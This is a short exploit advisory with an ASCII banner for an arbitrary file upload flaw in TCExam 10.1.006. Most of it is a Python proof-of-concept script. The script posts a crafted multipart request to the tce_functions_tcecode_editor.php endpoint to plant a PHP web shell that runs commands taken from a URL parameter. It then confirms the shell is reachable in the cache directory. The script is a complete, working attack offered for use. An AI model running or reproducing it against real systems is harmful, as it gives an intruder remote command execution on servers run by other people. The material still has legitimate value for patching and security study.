#============================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ # # ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ # # \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ # # )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ # # \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ # # # #============================================================================================================# # # # Vulnerability............Arbitrary Upload # # Software.................TCExam 10.1.006 # # Download.................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=tcexam # # Date.....................6/1/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # An arbitrary upload vulnerability in tce_functions_tcecode_editor.php of TCExam 10.1.006 can be exploited # # to upload a PHP shell. # # # # # # ##Proof of Concept## # # # import sys, socket host = 'localhost' tc_exam = 'http://' + host + '/TCExam' port = 80 def upload_shell(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) content = '------x\r\n'\ 'Content-Disposition: form-data; name="sendfile0"\r\n'\ '\r\n'\ 'shell.php\r\n'\ '------x\r\n'\ 'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\ 'Content-Type: application/octet-stream\r\n'\ '\r\n'\ '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\ '------x--\r\n'\ '\r\n' header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\ 'Host: ' + host + '\r\n'\ 'Proxy-Connection: keep-alive\r\n'\ 'User-Agent: x\r\n'\ 'Content-Length: ' + str(len(content)) + '\r\n'\ 'Cache-Control: max-age=0\r\n'\ 'Origin: null\r\n'\ 'Content-Type: multipart/form-data; boundary=----x\r\n'\ 'Accept: text/html\r\n'\ 'Accept-Encoding: gzip,deflate,sdch\r\n'\ 'Accept-Language: en-US,en;q=0.8\r\n'\ 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\ 'Cookie: LastVisit=1275442604\r\n'\ '\r\n' s.send(header + content) http_ok = 'HTTP/1.1 200 OK' if http_ok not in s.recv(8192): print 'error uploading shell' return else: print 'shell uploaded' s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\ 'Host: ' + host + '\r\n\r\n') if http_ok not in s.recv(8192): print 'shell not found' else: print 'shell located at ' + tc_exam + '/cache/shell.php' upload_shell()